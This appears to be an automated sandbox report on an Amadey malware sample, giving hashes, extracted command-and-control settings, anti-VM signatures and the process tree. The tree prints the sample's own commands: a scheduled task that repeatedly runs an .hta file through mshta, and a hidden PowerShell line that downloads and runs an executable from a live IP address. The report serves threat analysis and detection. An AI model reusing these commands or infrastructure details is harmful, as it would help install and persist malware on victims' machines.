Analysis
-
max time kernel
146s -
max time network
138s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
30/03/2025, 13:34
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
0e4ac18b2224b5d46bfb6a68417a0104
-
SHA1
38922c092ce214d8f87586f7ed13d68814a95057
-
SHA256
31bd1ef59c8715bdd8a5bf2e8231e43f9156d1b71901061b552dbbd37550960a
-
SHA512
6ffa7135c8a61329be36dbfca51c8f74b75e8ab8596d8407c1ea628f27b8b9a3e862ffdcfb1de40379b91ca33109bc0f2b9b57cffe3735649f9c8b86796e8629
-
SSDEEP
24576:/qDEvCTbMWu7rQYlBQcBiT6rprG8a0ou:/TvC/MTQYxsWR7a0o
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Signatures
-
Amadey family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempQJ0HE4GTEECZMMY4BSDOXZBJOGKQ1QDQ.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 1812 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1812 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 4 1812 powershell.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempQJ0HE4GTEECZMMY4BSDOXZBJOGKQ1QDQ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempQJ0HE4GTEECZMMY4BSDOXZBJOGKQ1QDQ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe -
Executes dropped EXE 2 IoCs
pid Process 2604 TempQJ0HE4GTEECZMMY4BSDOXZBJOGKQ1QDQ.EXE 3068 rapes.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine TempQJ0HE4GTEECZMMY4BSDOXZBJOGKQ1QDQ.EXE Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine rapes.exe -
Loads dropped DLL 4 IoCs
pid Process 1812 powershell.exe 1812 powershell.exe 2604 TempQJ0HE4GTEECZMMY4BSDOXZBJOGKQ1QDQ.EXE 2604 TempQJ0HE4GTEECZMMY4BSDOXZBJOGKQ1QDQ.EXE -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2604 TempQJ0HE4GTEECZMMY4BSDOXZBJOGKQ1QDQ.EXE 3068 rapes.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempQJ0HE4GTEECZMMY4BSDOXZBJOGKQ1QDQ.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempQJ0HE4GTEECZMMY4BSDOXZBJOGKQ1QDQ.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2964 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 1812 powershell.exe 1812 powershell.exe 1812 powershell.exe 2604 TempQJ0HE4GTEECZMMY4BSDOXZBJOGKQ1QDQ.EXE 3068 rapes.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1812 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2684 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2684 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2684 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2604 TempQJ0HE4GTEECZMMY4BSDOXZBJOGKQ1QDQ.EXE -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2684 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2684 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2684 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2684 wrote to memory of 2120 2684 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 2684 wrote to memory of 2120 2684 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 2684 wrote to memory of 2120 2684 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 2684 wrote to memory of 2120 2684 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 2684 wrote to memory of 2400 2684 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 2684 wrote to memory of 2400 2684 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 2684 wrote to memory of 2400 2684 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 2684 wrote to memory of 2400 2684 2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 2120 wrote to memory of 2964 2120 cmd.exe 33 PID 2120 wrote to memory of 2964 2120 cmd.exe 33 PID 2120 wrote to memory of 2964 2120 cmd.exe 33 PID 2120 wrote to memory of 2964 2120 cmd.exe 33 PID 2400 wrote to memory of 1812 2400 mshta.exe 34 PID 2400 wrote to memory of 1812 2400 mshta.exe 34 PID 2400 wrote to memory of 1812 2400 mshta.exe 34 PID 2400 wrote to memory of 1812 2400 mshta.exe 34 PID 1812 wrote to memory of 2604 1812 powershell.exe 37 PID 1812 wrote to memory of 2604 1812 powershell.exe 37 PID 1812 wrote to memory of 2604 1812 powershell.exe 37 PID 1812 wrote to memory of 2604 1812 powershell.exe 37 PID 2604 wrote to memory of 3068 2604 TempQJ0HE4GTEECZMMY4BSDOXZBJOGKQ1QDQ.EXE 38 PID 2604 wrote to memory of 3068 2604 TempQJ0HE4GTEECZMMY4BSDOXZBJOGKQ1QDQ.EXE 38 PID 2604 wrote to memory of 3068 2604 TempQJ0HE4GTEECZMMY4BSDOXZBJOGKQ1QDQ.EXE 38 PID 2604 wrote to memory of 3068 2604 TempQJ0HE4GTEECZMMY4BSDOXZBJOGKQ1QDQ.EXE 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn ouEYAma66r0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\T1V39q2Ew.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn ouEYAma66r0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\T1V39q2Ew.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2964
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\T1V39q2Ew.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'QJ0HE4GTEECZMMY4BSDOXZBJOGKQ1QDQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Users\Admin\AppData\Local\TempQJ0HE4GTEECZMMY4BSDOXZBJOGKQ1QDQ.EXE"C:\Users\Admin\AppData\Local\TempQJ0HE4GTEECZMMY4BSDOXZBJOGKQ1QDQ.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3068
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
717B
MD5c1e3fb83bb8b3c7392b1449596523cf8
SHA13ec1b31738a99e0a781c2452913cd74ad0dacc1e
SHA256c8e3ac8e8f7a4ca7fd4805458c2aa1c0c77cd2fae728c592a924cec44b68f4b5
SHA5123eb19f081428439d7b8dcc64fb6add7573af1de654300df849765a1c39843901cc72f58d73b361ee5841de7c1ac1b2c70b77944927946f7b434263b07b4d8589
-
Filesize
1.8MB
MD589431b16b25281a50a173f359ecbcebf
SHA1a5931bc59fd615f199461eb009262d26ff34c814
SHA25678d33d02042213510b32b2c13599a33d000cc66fd295714300a557872cfc125e
SHA512498c9a04ef7a5e60d249207dc25db7e3f38dc4339be10702a02d5c922ec30be0b254c8a55552642c1540aeec6dfa26de49a7abd7f65d7a6978352720d9adb7f2